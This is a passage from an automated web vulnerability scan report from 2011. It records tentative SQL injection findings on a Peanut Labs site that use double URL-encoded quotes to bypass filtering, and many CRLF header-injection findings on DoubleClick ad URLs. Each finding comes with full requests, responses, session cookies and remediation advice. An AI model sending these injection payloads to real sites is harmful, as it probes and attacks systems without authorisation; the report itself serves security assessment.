Host:   http://www1.peanutlabs.com
Path:   /wp-content/plugins/contact-form-7/scripts.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /wp-content/plugins/contact-form-7%2527/scripts.js HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sun, 09 Jan 2011 07:24:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 07:24:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Conte
...[SNIP]...

Request 2

GET /wp-content/plugins/contact-form-7%2527%2527/scripts.js HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 07:24:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 07:24:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40811


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Page not found</title>

<!-- ST
...[SNIP]...

1.28. http://www1.peanutlabs.com/xmlrpc.php [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www1.peanutlabs.com
Path:   /xmlrpc.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /xmlrpc.php HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sun, 09 Jan 2011 07:24:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 07:24:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Conte
...[SNIP]...

Request 2

GET /xmlrpc.php HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 2

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 07:24:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Content-Length: 42
Connection: close
Content-Type: text/plain

XML-RPC server accepts POST requests only.

2. HTTP header injection  previous  next
There are 29 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/ad/N6271.148484.FRONTLINEDIRECTINC./B4796131.29 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6271.148484.FRONTLINEDIRECTINC./B4796131.29

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 586bb%0d%0a9799c72b680 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /586bb%0d%0a9799c72b680/N6271.148484.FRONTLINEDIRECTINC./B4796131.29 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/586bb
9799c72b680
/N6271.148484.FRONTLINEDIRECTINC./B4796131.29:
Date: Sun, 09 Jan 2011 02:03:07 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/ad/downloads.pogo/category [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/downloads.pogo/category

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3913f%0d%0a3c0a349169b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3913f%0d%0a3c0a349169b/downloads.pogo/category HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3913f
3c0a349169b
/downloads.pogo/category:
Date: Sun, 09 Jan 2011 02:03:08 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/ad/home.pogo/spotlight [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/home.pogo/spotlight

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1e05c%0d%0a76a123a846 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1e05c%0d%0a76a123a846/home.pogo/spotlight;dcopt=ist;ag=af41;g=0;tile=1;sz=980x50;ord=759632? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1e05c
76a123a846
/home.pogo/spotlight%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D980x50%3Bord%3D759632:
Date: Sun, 09 Jan 2011 02:03:09 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/ad/scrabble.pogo/load [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/scrabble.pogo/load

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6a67f%0d%0a245da988542 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6a67f%0d%0a245da988542/scrabble.pogo/load HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6a67f
245da988542
/scrabble.pogo/load:
Date: Sun, 09 Jan 2011 02:03:14 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/ad/scrabble.pogo/room [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/scrabble.pogo/room

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6c29f%0d%0a119f9246290 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6c29f%0d%0a119f9246290/scrabble.pogo/room;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=326364? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6c29f
119f9246290
/scrabble.pogo/room%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D728x90%3Bord%3D326364:
Date: Sun, 09 Jan 2011 02:03:14 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5621.148484.0233710364621/B4682144

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5f927%0d%0a372c17095f9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5f927%0d%0a372c17095f9/N5621.148484.0233710364621/B4682144 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5f927
372c17095f9
/N5621.148484.0233710364621/B4682144:
Date: Sun, 09 Jan 2011 02:03:16 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adj/N6457.4298.ADVERTISING.COM/B4840137.13 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6457.4298.ADVERTISING.COM/B4840137.13

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2379a%0d%0acb4e6408377 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2379a%0d%0acb4e6408377/N6457.4298.ADVERTISING.COM/B4840137.13;sz=160x600;click=http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64?trg=;ord=0846642328? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2379a
cb4e6408377
/N6457.4298.ADVERTISING.COM/B4840137.13;sz=160x600;click=http: //r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn%3D64
Date: Sun, 09 Jan 2011 02:03:04 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adj/downloads.pogo/category [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/downloads.pogo/category

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 31153%0d%0aafba1dd703b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /31153%0d%0aafba1dd703b/downloads.pogo/category HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/31153
afba1dd703b
/downloads.pogo/category:
Date: Sun, 09 Jan 2011 02:02:58 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.9. http://ad.doubleclick.net/adj/home.pogo/spotlight [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/home.pogo/spotlight

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1329b%0d%0a901e1fb73e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1329b%0d%0a901e1fb73e9/home.pogo/spotlight HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1329b
901e1fb73e9
/home.pogo/spotlight:
Date: Sun, 09 Jan 2011 02:02:57 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.10. http://ad.doubleclick.net/adj/pand.default/prod.backstage [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/pand.default/prod.backstage

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1ee0e%0d%0a014a1f82eea was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1ee0e%0d%0a014a1f82eea/pand.default/prod.backstage HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1ee0e
014a1f82eea
/pand.default/prod.backstage:
Date: Sun, 09 Jan 2011 02:02:52 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.11. http://ad.doubleclick.net/adj/pand.default/prod.community [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/pand.default/prod.community

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 11083%0d%0a8a9bf6293f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /11083%0d%0a8a9bf6293f5/pand.default/prod.community;ag=0;gnd=0;hours=0;comped=0;fb=0;dma=0;clean=0;spgs=0;u=ag*0!gnd*0!hours*0!comped*0!fb*0!dma*0!clean*0!spgs*0;sz=728x90;tile=1;ord=1294536983566535667 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536983566535667&clean=0&spgs=0&tile=1&_id=leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/11083
8a9bf6293f5
/pand.default/prod.community%3Bag%3D0%3Bgnd%3D0%3Bhours%3D0%3Bcomped%3D0%3Bfb%3D0%3Bdma%3D0%3Bclean%3D0%3Bspgs%3D0%3Bu%3Dag%2A0%21gnd%2A0%21hours%2A0%21comped%2A0%21fb%2A0%21dma%2A0%21clean%2A0%21spgs%2A0%3Bsz%3D728x90%3Btile%3D1%3Bord%3D1294536983566535667:
Date: Sun, 09 Jan 2011 02:01:35 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.12. http://ad.doubleclick.net/adj/prize.pogo/prizes [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/prize.pogo/prizes

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 31be3%0d%0ad74a84518d3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /31be3%0d%0ad74a84518d3/prize.pogo/prizes;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=780687? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/prize/prize.do?pageSection=header_prizes
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/31be3
d74a84518d3
/prize.pogo/prizes%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D728x90%3Bord%3D780687:
Date: Sun, 09 Jan 2011 02:02:08 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.13. http://ad.doubleclick.net/adj/scrabble.pogo/load [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scrabble.pogo/load

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8b770%0d%0ab65cef34867 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8b770%0d%0ab65cef34867/scrabble.pogo/load;dcopt=ist;ag=af41;g=0;tile=1;sz=500x350;ord=910319? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8b770
b65cef34867
/scrabble.pogo/load%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D500x350%3Bord%3D910319:
Date: Sun, 09 Jan 2011 02:02:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.14. http://ad.doubleclick.net/adj/scrabble.pogo/room [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scrabble.pogo/room

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4a418%0d%0ac5139b784f3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4a418%0d%0ac5139b784f3/scrabble.pogo/room HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4a418
c5139b784f3
/scrabble.pogo/room:
Date: Sun, 09 Jan 2011 02:03:01 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.15. http://ad.doubleclick.net/adj/surveys.pogo/misc [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/surveys.pogo/misc

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 12804%0d%0a48b5790cf88 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /12804%0d%0a48b5790cf88/surveys.pogo/misc HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/12804
48b5790cf88
/surveys.pogo/misc:
Date: Sun, 09 Jan 2011 02:03:01 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.16. http://ad.doubleclick.net/jump/downloads.pogo/category [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/downloads.pogo/category

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 13037%0d%0afced369b2cc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /13037%0d%0afced369b2cc/downloads.pogo/category HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/13037
fced369b2cc
/downloads.pogo/category:
Date: Sun, 09 Jan 2011 02:03:24 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.17. http://ad.doubleclick.net/jump/home.pogo/spotlight [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/home.pogo/spotlight

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 556e1%0d%0a2fda3d0e5cf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /556e1%0d%0a2fda3d0e5cf/home.pogo/spotlight;dcopt=ist;ag=af41;g=0;tile=1;sz=980x50;ord=759632? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/556e1
2fda3d0e5cf
/home.pogo/spotlight%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D980x50%3Bord%3D759632:
Date: Sun, 09 Jan 2011 02:03:25 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.18. http://ad.doubleclick.net/jump/prize.pogo/prizes [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/prize.pogo/prizes

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 66506%0d%0acee2014b2d9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /66506%0d%0acee2014b2d9/prize.pogo/prizes HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/66506
cee2014b2d9
/prize.pogo/prizes:
Date: Sun, 09 Jan 2011 02:03:22 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.19. http://ad.doubleclick.net/jump/scrabble.pogo/load [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/scrabble.pogo/load

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 79e85%0d%0a73d9c50a5a7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /79e85%0d%0a73d9c50a5a7/scrabble.pogo/load;dcopt=ist;ag=af41;g=0;tile=1;sz=500x350;ord=910319? HTTP/1.1
